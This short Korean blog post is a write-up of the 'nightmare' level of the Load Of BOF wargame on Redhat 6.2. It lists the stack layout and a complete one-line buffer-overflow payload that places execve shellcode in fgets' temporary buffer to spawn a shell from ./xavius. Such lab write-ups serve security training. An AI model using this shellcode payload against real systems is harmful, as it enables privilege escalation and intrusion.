본문 바로가기

Wargames/Load Of BOF

LOB Redhat 6.2 - nightmare


nightmare - arg

Stack : *ret_addr[4] + buffer[40] + sfp[4] + ret[4]

read's temporary buffer : 0x40015000

Payload : (python -c 'print "\x90"*21 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x10\x50\x01\x40"';cat)|./xavius


Using fgets temporary buffer

'Wargames > Load Of BOF' 카테고리의 다른 글

LOB Redhat 6.2 - xavius  (0) 2015.11.02
LOB Redhat 6.2 - succubus  (0) 2015.11.02
LOB Redhat 6.2 - zombie_assassin  (0) 2015.10.30
LOB Redhat 6.2 - assassin  (0) 2015.10.30
LOB Redhat 6.2 - giant  (0) 2015.10.30